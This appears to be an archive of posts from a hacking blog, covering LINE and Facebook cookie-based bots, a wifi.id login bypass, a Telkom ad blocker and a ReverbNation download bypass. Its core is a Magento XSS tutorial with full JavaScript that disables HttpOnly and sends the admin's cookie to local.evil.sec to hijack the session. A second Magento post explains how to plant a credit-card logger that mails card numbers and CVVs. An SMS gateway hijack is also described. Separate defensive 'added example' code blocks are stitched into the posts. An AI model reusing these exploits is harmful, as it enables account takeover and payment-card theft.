
BOT Like LINE Home Feeds [Google App Script]

Here is a Google Apps Script that automatically likes posts on your own home feed / timeline.

https://script.google.com/d/1fbpAdfAat92n5I113g2E0l21tqO_95_w9ScBCtGt6EjqCLMJakDMvuTc/edit?usp=sharing


Steps
  • Click on the link above and sign in with your Google account.
  • Open "File" menu, choose "Make a copy".

  • Replace the "nama" values with your name and the "kuki" values with your LINE account cookies (read the instructions). How to get the LINE cookies is covered in the next section.
  • You may need to run the function "cekAkun()" to check whether the account is valid.
  • Then check the log after the function has run.
  • You can set the script to run automatically by setting the "Current project trigger" on the "Resources" menu.
How to get LINE cookies from browser
  • First, you must allow your LINE account to log in via PC (see the next section).
  • Go to https://timeline.line.me and sign in with your LINE account.
  • Press F12 on keyboard.
  • Refresh page (F5).
  • Copy the value of cookies in your browser.
  • Network > Choose one request at a domain timeline.line.me > Headers (on the right panel) > Request headers > Copy the cookies value from "Cookie" request header.


How to allow logins to the PC version of LINE
Please configure your login settings on your smartphone using the steps below:
  • Go to More > Settings > Account.
  • Tap Allow Login.

You can also open this menu by tapping this link from your smartphone.

How to set the like emoticon
The like emoticon is set with the variable 'tipe' (on line 9). The default is null, which sets the emoticon randomly. Each emoticon has a number:

[emoticon] = 1
[emoticon] = 2
[emoticon] = 3
[emoticon] = 4
[emoticon] = 5
[emoticon] = 6

Replace the null value of 'tipe' with one of the numbers above if you want to change the type of like emoticon.


Just write in the comment section below if you are curious about anything here, because curiosity has its own reason for existence, you know. (:

@wifi.id Bypass Login (2016) [APPS]

Hell yeah, I'm back again after a long time away. You must have been waiting for a while? :P

(Apps @wifi.id Bypass Login Preview)



Without further ado, here is how to use the application.

  • How
- Make sure you are connected to the @wifi.id SSID
- Make sure you have not yet authorized/logged in to @wifi.id
- Open http://8.8.8.8/ or anything else in a browser, so that the URL redirects to the @wifi.id main page
- Copy the URL of the @wifi.id main page from the address bar and paste it into the 'Default URL' field in the application
- Then click the 'Hajar!' button in the application
- Ping google.com to check whether you now have internet access.

If the tutorial above is still unclear, you can watch the video tutorial below:



Requirements :
- OS Windows
- .NET Framework 4.0 (or higher)

Virus Total: https://www.virustotal.com/id/file/4fa673....
Download : http://www.mediafire.com/download/hryoyj....  108 KB (111,104 bytes)




Okay, that's probably enough for this post about bypassing the @wifi.id login; I hope it's useful.
That's all, and thank you.



"Be proud in your own clothes."

How to Deal (means Block) with Telkom Ads?



  • What Is It?

I hope you already know about the case. Please read TELKOM Indonesia Secretly Injects Advertisements.

In short, the script works like this: when you use a browser that has been injected with the script, as in the image above, to open a page on a given site, the script forces the browser to load a page from the script source at *.u-ad.info and applies the script's instructions to the page you are viewing. That is why your browsing slows down a little and certain ads appear outside the content of the website you are reading. This only appears on non-HTTPS (plain HTTP) sites.



  • How to Deal?

There are several ways to deal with the disruption caused by the ad-injection script from *.u-ad.info, including;

1. Using a VPN (Virtual Private Network)
The ad injection performed by Telkom has no effect when you use a VPN, because a VPN is an encrypted connection path, just like HTTPS.

2. Using SSH (Secure Shell) Tunnelling
The method is more or less the same as using a VPN: it creates an encrypted connection path.

3. Filtering the Host
If you use Windows, edit the hosts file in the C:\Windows\System32\Drivers\etc folder and point *.u-ad.info to 127.0.0.1. Or, if the router you use has a blocklist feature, set up the block as follows;



4. Preventing Ad Injection
If you are a web developer, prevent ad injection by using a different body tag, as in the image above.

5. Using a Greasemonkey Script
Greasemonkey is a browser add-on that lets users install scripts that change web page content before or after the page is opened in the browser.
The changes are applied every time the page is displayed, which makes them effectively permanent for the user running the script.

First, install: https://addons.mozilla.org/firefox/addon/748, for Chrome: https://chrome.google.com/webstore/detail/tampermonkey/dhdgffkkebhmkfjojejmpbldmpobfkfo?hl=en

Then install this userscript: https://openuserjs.org/scripts/dwi.siswanto/Telkom_Ads_Blocker

Once that is done, test it by running the script below on a local server:


There is a difference: if you have not installed the userscript above, the frame URL shown will be unavailable (404/not found) at cfs.u-ad.info; if you have installed it, the frame URL will be unavailable at 127.0.0.1.
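
An added example for the host filtering in step 3, not part of the original post or of the linked userscript: the hosts file does not expand a wildcard such as *.u-ad.info, so this scans a page's HTML for resources loaded from u-ad.info subdomains and prints one hosts line per host found. The function names, the ads.u-ad.info host and the sample markup are constructed for illustration.

```javascript
// Added example (not from the original post or the userscript it links to).
// Finds resources a page loads from u-ad.info or any of its subdomains and
// turns them into hosts-file lines. All sample markup below is constructed.

const BLOCKED_SUFFIX = 'u-ad.info';

// Lower-case the host and drop a trailing dot ("cfs.u-ad.info." is the same name).
function normalizeHost(host) {
  return host.toLowerCase().replace(/\.$/, '');
}

// Match the domain itself or a subdomain, on a label boundary only,
// so a look-alike such as "notu-ad.info" is not flagged.
function isBlockedHost(host) {
  const h = normalizeHost(host);
  return h === BLOCKED_SUFFIX || h.endsWith('.' + BLOCKED_SUFFIX);
}

// Pull the src/href value out of every script, iframe, img and link tag.
function extractResourceUrls(html) {
  const urls = [];
  const tagRe = /<(?:script|iframe|img|link)\b[^>]*>/gi;
  const attrRe = /\s(?:src|href)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/i;
  let tag;
  while ((tag = tagRe.exec(html)) !== null) {
    const attr = attrRe.exec(tag[0]);
    if (attr) urls.push(attr[1] ?? attr[2] ?? attr[3]);
  }
  return urls;
}

// Resolve each URL against the page URL (handles relative and //host forms)
// and return the distinct blocked hosts, sorted.
function findInjectedHosts(html, pageUrl) {
  const hosts = new Set();
  for (const raw of extractResourceUrls(html)) {
    let url;
    try {
      url = new URL(raw, pageUrl);
    } catch (e) {
      continue; // not a parseable URL, nothing to block
    }
    if (isBlockedHost(url.hostname)) hosts.add(normalizeHost(url.hostname));
  }
  return [...hosts].sort();
}

// One hosts-file line per host: the hosts file does not expand wildcards.
function toHostsLines(hosts) {
  return hosts.map((h) => `127.0.0.1 ${h}`);
}

// Constructed sample: cfs.u-ad.info is the host named in the post,
// ADS.u-ad.info and the paths are made up for the example.
const SAMPLE_HTML = `
<html><head>
<script src="/static/app.js"></script>
<script type="text/javascript" src="http://cfs.u-ad.info/constructed/inject.js"></script>
</head><body>
<iframe src='//ADS.u-ad.info/constructed/frame'></iframe>
<img src="http://notu-ad.info/logo.png">
</body></html>`;

console.log(toHostsLines(findInjectedHosts(SAMPLE_HTML, 'http://example.com/')).join('\n'));
```
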


Deal? Thanks and please share. :)

[TUTS] Let's Exploit Magento! (<= 1.9.2.3)

Why?

A friend of mine sent me an interesting advisory the other day, demonstrating that there was an XSS exploit for the eCommerce platform Magento. I like security advisories, mainly because it's an interesting challenge and a good way to learn more about the underlying frameworks you're using. Since it was a lot of fun to exploit WordPress, I figured I'd try out this XSS exploit. It should go without saying, but don't try this on systems that aren't yours, or you'll be violating the law.

The plan

As pointed out in the interesting advisory, this is a flaw that has to be triggered by an administrator checking on an order. So in our pretend scenario we have two types of exploits going on:

  1. Taking advantage of the vulnerability itself
  2. Convincing the admin to check your order

Both of these are likely to be fairly easy given the nature of Magento. Calling or emailing an administrator in reference to your order would get any well-intentioned admin to check it out. And the first is trivially done according to the advisory by using the quoted form of an email address for your client account. So our attack plan is simple:

  1. Setup our server to receive information
  2. Perform exploit and call up our friendly admin
  3. Steal their credentials or perform actions under their name

Setup

First off, we need to download a version of magento that isn't patched, so we can grab any copy of magento that is less than 1.9.2.3 from the downloads page. I had to create an account to download the software, so do that if you need to (use guerrillamail if you need a quick email address to use). Then setup magento. In my case I'll be using apache with the following host setup:

# My New Magento Install! Nothing bad could happen :D 
<VirtualHost *:80>
    Servername local.magento.sec
    ErrorLog /tmp/error.log
    DocumentRoot /path/to/magento
    <Directory /path/to/magento >
        Options Indexes FollowSymLinks MultiViews
        AllowOverride All
        Order allow,deny
        allow from all
    </Directory>
</VirtualHost>

#My Evil domain that will exploit the poor thing:
<VirtualHost *:80>
    Servername local.evil.sec
    CustomLog /tmp/exploit.log combined
    DocumentRoot /tmp
    <Directory /tmp >
        Order allow,deny
        allow from all
    </Directory>
</VirtualHost>

And then setup your hosts file appropriately:

127.0.0.1 local.magento.sec local.evil.sec

And starting up apache and navigating to your local site should give you the installation screen and you can follow the instructions to setup magento. In my case, I had to update some permissions and install the php5-gd package on my system before being able to run magento. Your mileage may vary. Also, installing magento is slow, the database has over 300 tables in the base install, be patient as you install it.

Once you're setup, you should be able to log in to your admin panel and see that magento wants to update:

Ignoring that, create a product or two and verify that your site is working properly.

Confirming the exploit

Before we do anything complicated, we want to perform a smoke test to make sure that we can trigger the problem ourselves. We'll do the same test that the advisory did and simply alert on the page by using the email "><script>alert(1);</script>"@sucuri.net. When you do this from the checkout page you'll get an error saying it's not a valid email. However, this is only a front end check that we can trivially avoid by editing the HTML and removing the attributes the JS relies on to validate:

Click through the rest of the steps and place your order.

Then in the admin panel navigate to sales and your orders and verify that the exploit happens:

You'll see the pop-up twice before the page fully loads. Now the real question is what can we do?
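
For store owners checking whether an address of this shape has already been stored, here is an added example (not code from the original post or from Magento): it audits order e-mail addresses for quoted local parts that carry markup and shows the HTML escaping that keeps such a value inert when it is rendered. The row fields orderId and email are hypothetical names, and the sample rows are constructed from the two addresses quoted in this post.

```javascript
// Added example (not code from the original post or from Magento).
// Audits stored order e-mail addresses for the pattern used in the smoke test
// above and shows the output escaping that keeps such a value inert in HTML.

// Split at the LAST '@': a quoted local part may itself contain '@'.
function splitEmail(addr) {
  const at = addr.lastIndexOf('@');
  if (at <= 0 || at === addr.length - 1) return null;
  return { local: addr.slice(0, at), domain: addr.slice(at + 1) };
}

// Classify one address: 'ok', 'review' (quoted but harmless) or 'suspicious'.
function classifyEmail(addr) {
  const parts = splitEmail(addr);
  if (!parts) return { verdict: 'suspicious', reasons: ['not in local@domain form'] };

  const reasons = [];
  const quoted = parts.local.length >= 2 &&
    parts.local.startsWith('"') && parts.local.endsWith('"');
  const inner = quoted ? parts.local.slice(1, -1) : parts.local;

  if (/[<>]/.test(inner)) reasons.push('angle brackets in local part');
  if (/<\s*\/?\s*script\b|\bon\w+\s*=|javascript:/i.test(inner)) {
    reasons.push('script-like content in local part');
  }
  if (/[<>"'\s]/.test(parts.domain)) reasons.push('markup characters in domain');

  if (reasons.length > 0) return { verdict: 'suspicious', reasons };
  if (quoted) return { verdict: 'review', reasons: ['quoted local part'] };
  return { verdict: 'ok', reasons };
}

// Escape the five HTML-significant characters before the value is written
// into a page, so the browser shows the address as text.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Return only the rows that need a look, with the escaped form for display.
function auditOrders(rows) {
  return rows
    .map((r) => ({ orderId: r.orderId, display: escapeHtml(r.email), ...classifyEmail(r.email) }))
    .filter((r) => r.verdict !== 'ok');
}

// Constructed rows; orderId and email are hypothetical field names.
const SAMPLE_ORDERS = [
  { orderId: 1, email: 'alice@example.com' },
  { orderId: 2, email: '"><script>alert(1);</script>"@sucuri.net' },
  { orderId: 3, email: '"john smith"@example.com' },
  { orderId: 4, email: `"<script src='//local.evil.sec/a.js'></script>"@exploited.net` },
];

for (const row of auditOrders(SAMPLE_ORDERS)) {
  console.log(row.orderId, row.verdict, row.reasons.join('; '), '->', row.display);
}
```
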

Getting dirty

The first thing that comes to my mind is to attempt to steal the session of the admin user. But a quick look at the cookies of the page will tell us that such a thing won't work since the cookies are HTTP-Only:

So that seems like a dead end at first, but we can actually change the settings for these cookies from magento! The HTTP-Only setting is configured from the Web section of the System configuration page, and by default is turned on:

So the question becomes, how can we get to this page using our exploit? First off, we'll note that the navigation bar has an id of nav. So that's trivial to get via javascript:

var nav = document.getElementById('nav')

And once we do that it's simple to note that the navigation consists of links like the following:

<li class="  last level1">
    <a href="http://local.magento.sec/index.php/admin/system_config/index/key/d1b178d00a7755670c57af7f3f59bfa3/" class=""><span>Configuration</span></a>
</li>

We can't get much from the link itself, but the internal span tells us everything we need to know. Leveraging this:

var spans = nav.getElementsByTagName('span')
for(i in spans) { 
    if (spans[i].hasOwnProperty('textContent') && spans[i].textContent == "Configuration") { 
        configLink = spans[i].parentElement.href
    } 
}

And now we have the correct link to follow stored in configLink. Since magento uses prototype we can perform AJAX requests for pages pretty easily:

var configPage = document.createElement('span')
configPage.display = 'None';
new Ajax.Updater(configPage, configLink, {method: 'get'})

This will call up the system page which has another link we need. The HTTP Only settings are in the Web settings, so we'll find that link in the new page and then proceed from there:

var spans = configPage.getElementsByTagName('span')
for( var i = 0; i < spans.length; i++) {
    if (spans[i].hasOwnProperty('textContent') && spans[i].textContent.indexOf("Web")!=-1) { 
        webConfigLink = spans[i].parentElement.href
    } 
}
var webPage = document.createElement('span')
webPage.display = 'None'
new Ajax.Updater(webPage, webConfigLink, {method: 'get'})

Once we have this page we're nearly there. We just need to select the correct option for HTTP cookies and then submit the form. This is easy enough to do programmatically since the option has an id:

//Get the select menu:
var select = webPage.getElementsBySelector('[id=web_cookie_cookie_httponly]')[0]

//Set the options to No
for(var o = 0; o < select.options.length; o++) {
    select.options[o].value = 0 //set it to the 'No' value easily
}

//Grab that form
var form = webPage.getElementsByTagName('form')[0]
//Submit it via Ajax using prototype so the admin doesn't know
$(form).request({
    onFailure: function(){}, 
    onSuccess: function(t){
        //wait for it...
    }
})

Now that we've done that the HTTP-Only flag on the cookies is gone, which means that we can steal the admin's session.
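
Because the setting is changed silently, a store owner only notices if something watches the cookie flags. The following added example (not code from the original post or from Magento) compares Set-Cookie headers collected from the admin panel against a stored baseline and reports cookies that lost HttpOnly. The cookie names, values and dates in the sample headers are constructed assumptions.

```javascript
// Added example (not code from the original post or from Magento).
// Compares Set-Cookie headers seen from the admin panel against a stored
// baseline and reports cookies that are served without HttpOnly.

// Parse one Set-Cookie header into its name and security flags.
function parseSetCookie(header) {
  const [pair, ...attrs] = header.split(';').map((s) => s.trim());
  const eq = pair.indexOf('=');
  const name = eq === -1 ? pair : pair.slice(0, eq);
  // Attribute names are case-insensitive; attribute values are not needed here.
  const flags = new Set(attrs.map((a) => a.split('=')[0].trim().toLowerCase()));
  return { name, httpOnly: flags.has('httponly'), secure: flags.has('secure') };
}

// Index a list of headers by cookie name; a later header for the same name wins.
function indexByName(headers) {
  const byName = new Map();
  for (const h of headers) {
    const cookie = parseSetCookie(h);
    byName.set(cookie.name, cookie);
  }
  return byName;
}

// Report every cookie currently served without HttpOnly and say whether
// that is a regression against the baseline.
function diffCookieFlags(baselineHeaders, currentHeaders) {
  const before = indexByName(baselineHeaders);
  const findings = [];
  for (const cur of indexByName(currentHeaders).values()) {
    if (cur.httpOnly) continue;
    const prev = before.get(cur.name);
    let issue;
    if (!prev) issue = 'new cookie set without HttpOnly';
    else if (prev.httpOnly) issue = 'HttpOnly removed since baseline';
    else issue = 'HttpOnly missing in baseline and now';
    findings.push({ name: cur.name, issue });
  }
  return findings;
}

// Constructed headers. The cookie names are assumptions for the example.
const BASELINE_HEADERS = [
  'adminhtml=constructedvalue1; expires=Thu, 07-Jan-2016 10:00:00 GMT; path=/; domain=local.magento.sec; HttpOnly',
  'frontend=constructedvalue2; path=/; domain=local.magento.sec; httponly',
];
const CURRENT_HEADERS = [
  'adminhtml=constructedvalue1; expires=Thu, 07-Jan-2016 11:00:00 GMT; path=/; domain=local.magento.sec',
  'frontend=constructedvalue2; path=/; domain=local.magento.sec; httponly',
  'constructed_pref=1; path=/',
];

for (const f of diffCookieFlags(BASELINE_HEADERS, CURRENT_HEADERS)) {
  console.log(`${f.name}: ${f.issue}`);
}
```
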

To send the session to the hacker we'll use our second virtual host and the oldest trick in the book, the access log! Updating the wait for it part of our form handler code gives us the final step to our hijack:

onSuccess: function(t){
    var logPage = document.createElement('span')
    var evil = 'http://local.evil.sec?' + document.cookie
    logPage.display = 'None'
    new Ajax.Updater(logPage, evil, {method: 'get'})    
}

Once you do this, you'll see the admin cookie appear in the log file of the hacker's domain:

Once we've got this, we just do a simple cookie setting and we're good to run wild. First go to the admin page and open up your console. Then set the document to be the value sent in your request:

Refresh the page and you'll have access to the admin console:

Putting it all together

It's easy to write all the above into the console to verify that it works, but it's another thing to actually use the email exploit to run the code. We have two options:

  1. Insert all that code into the email address
  2. Have the email address inject a script to handle things for us

Either way we need to wrap the code into a single package so let's do that:

/** Helpers */
function findLinkInSpan(spans, search) {
    for(i in spans) { 
        if (spans[i].hasOwnProperty('textContent') && spans[i].textContent.trim() == search.trim()) {
            return spans[i].parentElement.href;
        } 
    }
}

/** Wait for the AJAX to stick the data into our target element */
var waitingTime = 3000;

function exploitOrderPage() {
    /** Navigate the menu */
    var nav = document.getElementById('nav');
    var spans = nav.getElementsByTagName('span');
    configLink = findLinkInSpan(spans, "Configuration");

    /** Global for exploitConfigPage to use */
    configPage = document.createElement('span');
    configPage.display = 'None';
    new Ajax.Updater(configPage, configLink, {
            method: 'get', 
            onSuccess: function(){
                setTimeout(function(){
                    exploitConfigPage()
                }, waitingTime); 
            }
        }
    );
}

function exploitConfigPage() {
    var spans = configPage.getElementsByTagName('span');
    var webConfigLink = findLinkInSpan(spans, 'Web');

    /** Global for exploitWebPage to use */
    webPage = document.createElement('span');
    webPage.display = 'None';
    new Ajax.Updater(webPage, webConfigLink, {
            method: 'get', 
            onSuccess: function(){
                setTimeout(function(){
                    exploitWebPage();
                },waitingTime);
            }
        }
    );
}

function exploitWebPage() {
    var select = webPage.getElementsBySelector('[id=web_cookie_cookie_httponly]')[0];
    for(var o = 0; o < select.options.length; o++) {
        select.options[o].value = 0; //set it to the 'No' value easily
    }
    var form = webPage.getElementsByTagName('form')[0]
    //Submit it via Ajax using prototype so the admin doesn't know
    $(form).request({
        onFailure: function(){}, 
        onSuccess: function(t){
            var logPage = document.createElement('span');
            var evil = 'http://local.evil.sec?' + document.cookie;
            logPage.display = 'None';
            new Ajax.Updater(logPage, evil, {method: 'get'});
        }
    })
}

/** On load we want to hide the weird email from the admin and steal! */
var anchors = document.getElementsByTagName('a')
for(var i = 0; i < anchors.length; i++) {
    if(anchors[i] && anchors[i].href == 'mailto:') {
        anchors[i].textContent = 'user@example.com';
    }
}
//GO!
exploitOrderPage();

The code is a little rough because we have a series of callbacks that fire as the pages are loaded into the target divs by prototype. In my testing it seemed like there was enough delay between when the request completed and when variables like configPage were filled with data that a timeout was the only way to ensure that there was data available to iterate over with .getElementsByTagName.

Note that even though we don't have any CORS headers on our evil domain, we don't actually need them to get the credentials in our log file since the preflight request will show up in the log. If you were a real attacker trying to be silent, you'd likely adjust your server accordingly.

So let's try the first tactic, putting all of the code into an email address in the checkout form:

And editing the HTML with the inspector to remove the validation from the element results in

And checking out the magento source it looks like the length calculation is pretty small:

//lib/Zend/Validate/EmailAddress.php
 if ((strlen($this->_localPart) > 64) || (strlen($this->_hostname) > 255)) {
    $length = false;
    $this->_error(self::LENGTH_EXCEEDED);
}

So it seems like the first attempt is out since the full script can't be fit into 64 characters. So instead let's try to load it from our evil domain! We can do this by saving our script to a.js and loading it via a script tag with the malicious email:

"<script src='//local.evil.sec/a.js'></script>"@exploited.net

This comes in at 47 characters, so if you're testing with a longer local domain name then a link shortener would be a good idea. Or if you don't mind whiting out most of the screen you can drop seven characters by removing the closing <script> tag (though that makes the attack more obvious).

Submit your order after filling out the rest of the fields:

Navigating from our admin window to the new order, we'll be greeted with our usual screen, but if we open up the console in a few seconds we'll start to see the effects of the attack:

And in our log files:

Using this value we can then update our cookie from our hacker's perspective:

Then simply click in the url and navigate to /admin and you've successfully broken into a magento site using an exploit and session hijacking!

So what now?

Now you go and you update magento so that you don't run into someone pulling this trick on you! The last thing you need is a random user getting access to customer information, saved credit cards, or anything like that! Just browsing through the configuration screens, it's easy to see multiple attack vectors that one could use to install back-doors to the system so that even after they upgrade, the attack can still get in.

Security is important, and I've written this post so that if anyone is using an old version of magento in production they can go to their boss, demonstrate the attack here, and get their blessing to spend as much time as necessary in patching their system. It's not always fun to upgrade when we could be developing, but doing so keeps the entire internet healthy (you don't want your servers or clients helping out with a DDoS do you?). So get out there and patch!

Obvious Disclaimer

In case it's not obvious: this is example code meant for educational purposes only. Do not run this on any machine you do not own! It is a violation of both state and federal law that often carries a hefty fine. Just don't do it.



Source: http://www.plasticsurgery.whoseopinion.com

[SCRIPT] OpenVPN Config Grabber from VPN Gate



First, you must install OpenVPN Client. Download here!

Then, look below.
script;



Usage; open this PHP script with a browser.
The config will be saved into the document root of your htdocs directory (if you're using XAMPP, i.e. the Apache server).



CMS Detector, More Than 50+ CMS to Detect

(CMS Detector preview in Windows)

Sometimes, for whatever reasons, you will want to know if a website is using a content management system (cms), and if so, which one. 
This is a rather complicated procedure, but we did our best to collect in our service the maximum number of features that can help define a website's cms.

What's CMS?
From Wikipedia, a content management system (CMS) is a computer application that supports the creation and modification of digital content using a common user interface and thus usually supporting multiple users working in a collaborative environment. CMSes have been available since the late 1990s.

CMS features vary widely. Most CMSes include Web-based publishing, format management, edit history and version control, indexing, search, and retrieval. By their nature, content management systems support the separation of content and presentation.

How to identify which CMS is used on a website?
This tool will analyze websites and attempt to detect the platform, language, framework and other technologies used for any website.

usage; this.php <host>



This is an experimental service, please contact us if any problem occurs or if you think a site has been wrongly detected.

[TUTS] How to Add CreditCard Logger in Magento?

Proof of Concept


First, you must exploit Magento site.
Here's auto exploiter script written by my homies FathurFreakz[coder]



File: app/code/core/Mage/Paygate/Authorizenet.php

$payment->getOrder()->getBillingAddress(); // Billing Address
$payment->getCcType(); // CC Type
$payment->getCcOwner(); // Cardholder Name
$payment->getCcNumber(); // CC Number
sprintf('%02d-%04d', $payment->getCcExpMonth(), $payment->getCcExpYear()); // CC Expire
$payment->getCcCid(); // CC CVV


Just add mail() function inside _place() function between self::RESPONSE_CODE_APPROVED:.


Regards :)

[SCRIPT] Bot RSS Feeds Transferer to Facebook

Bot RSS Feeds Transferer to Facebook? Huh? What's that?
Some of you may not know it yet, and for others it is nothing new.
Have you ever seen a website with an RSS logo or the word RSS on it? The answer is "yes!". Most of the time, when we open a website or visit a blog, there is an RSS facility. So what actually is RSS? And what is it for?

RSS is an XML-format file used for a website or blog (Source : http://id.wikipedia.org/wiki/RSS). The abbreviation RSS refers to several protocols, including :
  • 1. Really Simple Syndication (RSS 2.0)
  • 2. RDF Site Summary (RSS 0.9 and 1.0)
  • 3. Rich Text Summary (RSS 0.91)
Put simply, it is a technology that makes it easy for us to get the latest information from a website or blog without having to open that website.

Then, what is a feed? A feed is an aggregator that checks sites that provide RSS and displays the new articles it finds. A feed can be a computer program or an online service.

Using RSS is not difficult. Well, of course! What is difficult these days? It's just click-enter-click-enter; even making a robot hand is (they say) easy.

But this post is not about how to use RSS or how to make that robot hand. It is about how to push the latest information from a target website or blog to Facebook, which I have implemented in PHP.
This is the same as the applications you commonly find scattered around Facebook if you search for RSS in the application category.





What you need to prepare here;
  • 1. Facebook cookies (How to get?)
  • 2. The User ID or Group ID of the target you want to transfer to
  • 3. A list of RSS feeds

Alright, let's get straight to it. Here is the script.


rss-bot.php





Note
2. define("COOKIES", "...");
Enter all of your Facebook cookies (separate each parameter with a semicolon ';'). This is to obtain authorization to the Facebook REST API with a new access token that is requested each time the script runs.

3. define("TARGET", "");

This does not apply if you want to transfer to your own timeline (it can be left empty); the default value is: me.

4. define("LOG", "rss-log.txt");
It is recommended to create an empty file with the same name as written in the code, in order to avoid duplicating statuses that have already been posted.

12. $rss = array(
         ...
    );
If you want to set or change the list of RSS feeds, go ahead, provided the RSS feed URLs are valid (ext:XML).

The recommended trigger is once every 5 hours.


Maybe that's enough to know for now? If anyone experiences a masturbation failure, let it out in the comments.
Thank you. ^^

[SCRIPT] Bot Twitter Reply by SimSimi




A few months ago, someone asked me to make a bot that replies to tweets (using SimSimi). Sorry I could only respond to the request now. Hihihi.




What is SimSimi? I previously explained what SimSimi is in the post Bot Telegram SimSimi, so at this point I don't need to be long-winded.

First, download the TwitterOAuth PHP Library by Abraham.

Then you need a consumer key, consumer secret, token key and token secret. You can find them at Twitter Application Management.


bot.php


Note
17. define('LANG', 'en');
Line 17 sets the language SimSimi uses to reply to tweets. (Can't be blank)
Available: az (Azerbaijani), de (Dutch), en (English), fr (French), it (Italian), pt (Portuguese), ru (Russian), es (Spanish), tl (Tagalog) and tr (Turkish).

18. define('LOG', 'log.txt');
Line 18 defines the log file for the tweets that have already been answered, in order to avoid duplicates.

23. $tuit = ambil("statuses/mentions_timeline", array("count" => "1"));
The variable $tuit on line 23 calls the function ambil(). Count is the number of tweets (mentions) to fetch. Recommended: 5.



I think that's enough. If you have questions or problems with the code, please comment. :)

[TUTS] SMS Gratis ke Indonesia Gateway Hijack

The victim gateway server is; smsgratis2indonesia{dot}co{dot}id
Let's see how it works!

(SMS Gratis ke Indonesia Gateway Hijack 1.0)


# usage; http://localhost/this.php?no={victim/target number}&text={your text}



[SCRIPT] How to ping a host with PHP?

# usage; this.php domain/ip


[APPS] BBM 2.10.0.31 Mod Transparent

If you droiders are bored with the look of the official BlackBerry Messenger app, this BlackBerry Messenger (v. 2.10.0.31) mod can be an alternative to install on your Android handheld.



  • Features :
- Transparent Theme
- On/Off Block Read
- Grayscale Display Picture
- Full Display Picture
- Shape Display Picture
- Flash Lamp
- Lock Mode
- Post Image to Facebook
- Move to SDcard
- Auto Rotation
- Enable Auto Text
- Reload Button
- Enable Custom Font
- Enable
, Emoticon




  • Screenshot :






  • Download  :
(click here for download)






  • How to :

- Uninstall the original BlackBerry Messenger.
Note : No need to worry about your PIN changing or your contacts being lost, because if you log in with the same email, nothing changes at all from before.
- Open Settings > Security > tick Unknown sources.
- Open the BlackBerry Mod APK you just downloaded.
- Install.




Muwehehehehe, that's probably enough for now. The next post, Insha'Allah, will discuss how to modify Android applications. Hamdoelelah. :)

[EXPLOIT] How to Bypass ReverbNation Disable Download (w/o Software)



What is ReverbNation?

ReverbNation is a website that focuses on the independent music industry and aims to provide a central site for musicians, producers, and venues to collaborate and communicate. In essence, it is a music storage medium, much like iTunes.

Here I just want to give a tutorial on how to bypass the restriction on songs for which download permission has not been granted (disable download).
After I searched Google for "how to bypass / how to download disabled songs from reverb", the majority of authors suggested using software (such as IDM, etc.) to get them.

Just yesterday I did some research (read: messing around) to do something like this. And this is roughly the result of that experiment.

I take as an example my song Anak Kemaren Sore (which isn't finished yet :P), which has no download permission. All we do is manipulate the request to the server (read: exploit).


How it works

  • 1. Play the song (to obtain the cookies and other attributes)


Save the cookie underlined in the screenshot above (only its hash).


  • 2. Exploitation
Then we perform the exploitation so that it can be downloaded.

$ wget https://www.reverbnation.com/audio_player/html_player_stream/{_reverb_currentsong cookies}?sid={songs id} -O file-name.mp3


A simple way to get the songs id;




  • 3. Proof of Concept



Well, that seems to be enough of my write-up on how to bypass ReverbNation downloads.

To close, I say: pursue knowledge all the way to Kuvukiland (Africa).
I hope it's useful.